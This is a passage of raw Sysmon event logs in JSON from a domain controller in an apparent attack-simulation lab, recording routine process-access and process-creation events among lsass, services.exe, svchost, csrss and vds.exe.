07:53:24.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1268,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.050\r\nProcessGuid: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nProcessId: 3480\r\nImage: C:\\Windows\\System32\\vds.exe\r\nFileVersion: 10.0.14393.2608 (rs1_release.181024-1742)\r\nDescription: Virtual Disk Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vds.exe\r\nCommandLine: C:\\Windows\\System32\\vds.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.050","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","Image":"C:\\Windows\\System32\\vds.exe","FileVersion":"10.0.14393.2608 (rs1_release.181024-1742)","Description":"Virtual Disk Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vds.exe","CommandLine":"C:\\Windows\\System32\\vds.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
